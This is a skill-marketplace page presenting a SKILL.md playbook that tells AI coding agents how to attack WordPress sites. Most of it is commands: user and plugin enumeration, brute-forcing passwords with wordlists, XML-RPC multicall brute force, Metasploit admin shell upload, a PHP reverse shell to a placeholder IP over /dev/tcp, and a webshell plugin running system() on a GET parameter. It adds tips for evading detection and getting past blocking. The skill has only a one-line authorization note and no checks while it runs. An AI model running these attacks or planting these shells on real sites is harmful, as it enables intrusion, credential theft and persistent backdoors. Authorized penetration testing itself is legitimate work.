How do I install WordPress Penetration Testing?

Install WordPress Penetration Testing with a single command: npx mdskills install sickn33/wordpress-penetration-testing. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support WordPress Penetration Testing?

WordPress Penetration Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

WordPress Penetration Testing

Name: WordPress Penetration Testing: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". It provides comprehensive WordPress security assessment methodologies.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/wordpress-penetration-testing

Fork & Edit

Skill Advisor8.0

Comprehensive WordPress pentesting guide with detailed commands and exploitation techniques across 10 phases

+Provides extensive enumeration and exploitation commands with clear examples
+Structures testing into logical phases with quick reference tables
+Covers advanced techniques including XML-RPC exploitation and evasion methods
-Lacks trigger conditions for when agent should initiate testing autonomously
-Does not address validation of authorization or ethical boundaries during execution

SKILL.md

Edit in Browser

1---
2name: WordPress Penetration Testing
3description: This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". It provides comprehensive WordPress security assessment methodologies.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# WordPress Penetration Testing
10 
11## Purpose
12 
13Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.
14 
15## Prerequisites
16 
17### Required Tools
18- WPScan (pre-installed in Kali Linux)
19- Metasploit Framework
20- Burp Suite or OWASP ZAP
21- Nmap for initial discovery
22- cURL or wget
23 
24### Required Knowledge
25- WordPress architecture and structure
26- Web application testing fundamentals
27- HTTP protocol understanding
28- Common web vulnerabilities (OWASP Top 10)
29 
30## Outputs and Deliverables
31 
321. **WordPress Enumeration Report** - Version, themes, plugins, users
332. **Vulnerability Assessment** - Identified CVEs and misconfigurations
343. **Credential Assessment** - Weak password findings
354. **Exploitation Proof** - Shell access documentation
36 
37## Core Workflow
38 
39### Phase 1: WordPress Discovery
40 
41Identify WordPress installations:
42 
43```bash
44# Check for WordPress indicators
45curl -s http://target.com | grep -i wordpress
46curl -s http://target.com | grep -i "wp-content"
47curl -s http://target.com | grep -i "wp-includes"
48 
49# Check common WordPress paths
50curl -I http://target.com/wp-login.php
51curl -I http://target.com/wp-admin/
52curl -I http://target.com/wp-content/
53curl -I http://target.com/xmlrpc.php
54 
55# Check meta generator tag
56curl -s http://target.com | grep "generator"
57 
58# Nmap WordPress detection
59nmap -p 80,443 --script http-wordpress-enum target.com
60```
61 
62Key WordPress files and directories:
63- `/wp-admin/` - Admin dashboard
64- `/wp-login.php` - Login page
65- `/wp-content/` - Themes, plugins, uploads
66- `/wp-includes/` - Core files
67- `/xmlrpc.php` - XML-RPC interface
68- `/wp-config.php` - Configuration (not accessible if secure)
69- `/readme.html` - Version information
70 
71### Phase 2: Basic WPScan Enumeration
72 
73Comprehensive WordPress scanning with WPScan:
74 
75```bash
76# Basic scan
77wpscan --url http://target.com/wordpress/
78 
79# With API token (for vulnerability data)
80wpscan --url http://target.com --api-token YOUR_API_TOKEN
81 
82# Aggressive detection mode
83wpscan --url http://target.com --detection-mode aggressive
84 
85# Output to file
86wpscan --url http://target.com -o results.txt
87 
88# JSON output
89wpscan --url http://target.com -f json -o results.json
90 
91# Verbose output
92wpscan --url http://target.com -v
93```
94 
95### Phase 3: WordPress Version Detection
96 
97Identify WordPress version:
98 
99```bash
100# WPScan version detection
101wpscan --url http://target.com
102 
103# Manual version checks
104curl -s http://target.com/readme.html | grep -i version
105curl -s http://target.com/feed/ | grep -i generator
106curl -s http://target.com | grep "?ver="
107 
108# Check meta generator
109curl -s http://target.com | grep 'name="generator"'
110 
111# Check RSS feeds
112curl -s http://target.com/feed/
113curl -s http://target.com/comments/feed/
114```
115 
116Version sources:
117- Meta generator tag in HTML
118- readme.html file
119- RSS/Atom feeds
120- JavaScript/CSS file versions
121 
122### Phase 4: Theme Enumeration
123 
124Identify installed themes:
125 
126```bash
127# Enumerate all themes
128wpscan --url http://target.com -e at
129 
130# Enumerate vulnerable themes only
131wpscan --url http://target.com -e vt
132 
133# Theme enumeration with detection mode
134wpscan --url http://target.com -e at --plugins-detection aggressive
135 
136# Manual theme detection
137curl -s http://target.com | grep "wp-content/themes/"
138curl -s http://target.com/wp-content/themes/
139```
140 
141Theme vulnerability checks:
142```bash
143# Search for theme exploits
144searchsploit wordpress theme <theme_name>
145 
146# Check theme version
147curl -s http://target.com/wp-content/themes/<theme>/style.css | grep -i version
148curl -s http://target.com/wp-content/themes/<theme>/readme.txt
149```
150 
151### Phase 5: Plugin Enumeration
152 
153Identify installed plugins:
154 
155```bash
156# Enumerate all plugins
157wpscan --url http://target.com -e ap
158 
159# Enumerate vulnerable plugins only
160wpscan --url http://target.com -e vp
161 
162# Aggressive plugin detection
163wpscan --url http://target.com -e ap --plugins-detection aggressive
164 
165# Mixed detection mode
166wpscan --url http://target.com -e ap --plugins-detection mixed
167 
168# Manual plugin discovery
169curl -s http://target.com | grep "wp-content/plugins/"
170curl -s http://target.com/wp-content/plugins/
171```
172 
173Common vulnerable plugins to check:
174```bash
175# Search for plugin exploits
176searchsploit wordpress plugin <plugin_name>
177searchsploit wordpress mail-masta
178searchsploit wordpress slideshow gallery
179searchsploit wordpress reflex gallery
180 
181# Check plugin version
182curl -s http://target.com/wp-content/plugins/<plugin>/readme.txt
183```
184 
185### Phase 6: User Enumeration
186 
187Discover WordPress users:
188 
189```bash
190# WPScan user enumeration
191wpscan --url http://target.com -e u
192 
193# Enumerate specific number of users
194wpscan --url http://target.com -e u1-100
195 
196# Author ID enumeration (manual)
197for i in {1..20}; do
198    curl -s "http://target.com/?author=$i" | grep -o 'author/[^/]*/'
199done
200 
201# JSON API user enumeration (if enabled)
202curl -s http://target.com/wp-json/wp/v2/users
203 
204# REST API user enumeration
205curl -s http://target.com/wp-json/wp/v2/users?per_page=100
206 
207# Login error enumeration
208curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php
209```
210 
211### Phase 7: Comprehensive Enumeration
212 
213Run all enumeration modules:
214 
215```bash
216# Enumerate everything
217wpscan --url http://target.com -e at -e ap -e u
218 
219# Alternative comprehensive scan
220wpscan --url http://target.com -e vp,vt,u,cb,dbe
221 
222# Enumeration flags:
223# at - All themes
224# vt - Vulnerable themes
225# ap - All plugins
226# vp - Vulnerable plugins
227# u  - Users (1-10)
228# cb - Config backups
229# dbe - Database exports
230 
231# Full aggressive enumeration
232wpscan --url http://target.com -e at,ap,u,cb,dbe \
233    --detection-mode aggressive \
234    --plugins-detection aggressive
235```
236 
237### Phase 8: Password Attacks
238 
239Brute-force WordPress credentials:
240 
241```bash
242# Single user brute-force
243wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt
244 
245# Multiple users from file
246wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt
247 
248# With password attack threads
249wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50
250 
251# XML-RPC brute-force (faster, may bypass protection)
252wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc
253 
254# Brute-force with API limiting
255wpscan --url http://target.com -U admin -P passwords.txt --throttle 500
256 
257# Create targeted wordlist
258cewl http://target.com -w wordlist.txt
259wpscan --url http://target.com -U admin -P wordlist.txt
260```
261 
262Password attack methods:
263- `wp-login` - Standard login form
264- `xmlrpc` - XML-RPC multicall (faster)
265- `xmlrpc-multicall` - Multiple passwords per request
266 
267### Phase 9: Vulnerability Exploitation
268 
269#### Metasploit Shell Upload
270 
271After obtaining credentials:
272 
273```bash
274# Start Metasploit
275msfconsole
276 
277# Admin shell upload
278use exploit/unix/webapp/wp_admin_shell_upload
279set RHOSTS target.com
280set USERNAME admin
281set PASSWORD jessica
282set TARGETURI /wordpress
283set LHOST <your_ip>
284exploit
285```
286 
287#### Plugin Exploitation
288 
289```bash
290# Slideshow Gallery exploit
291use exploit/unix/webapp/wp_slideshowgallery_upload
292set RHOSTS target.com
293set TARGETURI /wordpress
294set USERNAME admin
295set PASSWORD jessica
296set LHOST <your_ip>
297exploit
298 
299# Search for WordPress exploits
300search type:exploit platform:php wordpress
301```
302 
303#### Manual Exploitation
304 
305Theme/plugin editor (with admin access):
306 
307```php
308// Navigate to Appearance > Theme Editor
309// Edit 404.php or functions.php
310// Add PHP reverse shell:
311 
312<?php
313exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
314?>
315 
316// Or use weevely backdoor
317// Access via: http://target.com/wp-content/themes/theme_name/404.php
318```
319 
320Plugin upload method:
321 
322```bash
323# Create malicious plugin
324cat > malicious.php << 'EOF'
325<?php
326/*
327Plugin Name: Malicious Plugin
328Description: Security Testing
329Version: 1.0
330*/
331if(isset($_GET['cmd'])){
332    system($_GET['cmd']);
333}
334?>
335EOF
336 
337# Zip and upload via Plugins > Add New > Upload Plugin
338zip malicious.zip malicious.php
339 
340# Access webshell
341curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id"
342```
343 
344### Phase 10: Advanced Techniques
345 
346#### XML-RPC Exploitation
347 
348```bash
349# Check if XML-RPC is enabled
350curl -X POST http://target.com/xmlrpc.php
351 
352# List available methods
353curl -X POST -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://target.com/xmlrpc.php
354 
355# Brute-force via XML-RPC multicall
356cat > xmlrpc_brute.xml << 'EOF'
357<?xml version="1.0"?>
358<methodCall>
359<methodName>system.multicall</methodName>
360<params>
361<param><value><array><data>
362<value><struct>
363<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
364<member><name>params</name><value><array><data>
365<value><string>admin</string></value>
366<value><string>password1</string></value>
367</data></array></value></member>
368</struct></value>
369<value><struct>
370<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
371<member><name>params</name><value><array><data>
372<value><string>admin</string></value>
373<value><string>password2</string></value>
374</data></array></value></member>
375</struct></value>
376</data></array></value></param>
377</params>
378</methodCall>
379EOF
380 
381curl -X POST -d @xmlrpc_brute.xml http://target.com/xmlrpc.php
382```
383 
384#### Scanning Through Proxy
385 
386```bash
387# Use Tor proxy
388wpscan --url http://target.com --proxy socks5://127.0.0.1:9050
389 
390# HTTP proxy
391wpscan --url http://target.com --proxy http://127.0.0.1:8080
392 
393# Burp Suite proxy
394wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks
395```
396 
397#### HTTP Authentication
398 
399```bash
400# Basic authentication
401wpscan --url http://target.com --http-auth admin:password
402 
403# Force SSL/TLS
404wpscan --url https://target.com --disable-tls-checks
405```
406 
407## Quick Reference
408 
409### WPScan Enumeration Flags
410 
411| Flag | Description |
412|------|-------------|
413| `-e at` | All themes |
414| `-e vt` | Vulnerable themes |
415| `-e ap` | All plugins |
416| `-e vp` | Vulnerable plugins |
417| `-e u` | Users (1-10) |
418| `-e cb` | Config backups |
419| `-e dbe` | Database exports |
420 
421### Common WordPress Paths
422 
423| Path | Purpose |
424|------|---------|
425| `/wp-admin/` | Admin dashboard |
426| `/wp-login.php` | Login page |
427| `/wp-content/uploads/` | User uploads |
428| `/wp-includes/` | Core files |
429| `/xmlrpc.php` | XML-RPC API |
430| `/wp-json/` | REST API |
431 
432### WPScan Command Examples
433 
434| Purpose | Command |
435|---------|---------|
436| Basic scan | `wpscan --url http://target.com` |
437| All enumeration | `wpscan --url http://target.com -e at,ap,u` |
438| Password attack | `wpscan --url http://target.com -U admin -P pass.txt` |
439| Aggressive | `wpscan --url http://target.com --detection-mode aggressive` |
440 
441## Constraints and Limitations
442 
443### Legal Considerations
444- Obtain written authorization before testing
445- Stay within defined scope
446- Document all testing activities
447- Follow responsible disclosure
448 
449### Technical Limitations
450- WAF may block scanning
451- Rate limiting may prevent brute-force
452- Some plugins may have false negatives
453- XML-RPC may be disabled
454 
455### Detection Evasion
456- Use random user agents: `--random-user-agent`
457- Throttle requests: `--throttle 1000`
458- Use proxy rotation
459- Avoid aggressive modes on monitored sites
460 
461## Troubleshooting
462 
463### WPScan Shows No Vulnerabilities
464 
465**Solutions:**
4661. Use API token for vulnerability database
4672. Try aggressive detection mode
4683. Check for WAF blocking scans
4694. Verify WordPress is actually installed
470 
471### Brute-Force Blocked
472 
473**Solutions:**
4741. Use XML-RPC method instead of wp-login
4752. Add throttling: `--throttle 500`
4763. Use different user agents
4774. Check for IP blocking/fail2ban
478 
479### Cannot Access Admin Panel
480 
481**Solutions:**
4821. Verify credentials are correct
4832. Check for two-factor authentication
4843. Look for IP whitelist restrictions
4854. Check for login URL changes (security plugins)
486

Full transparency — inspect the skill content before installing.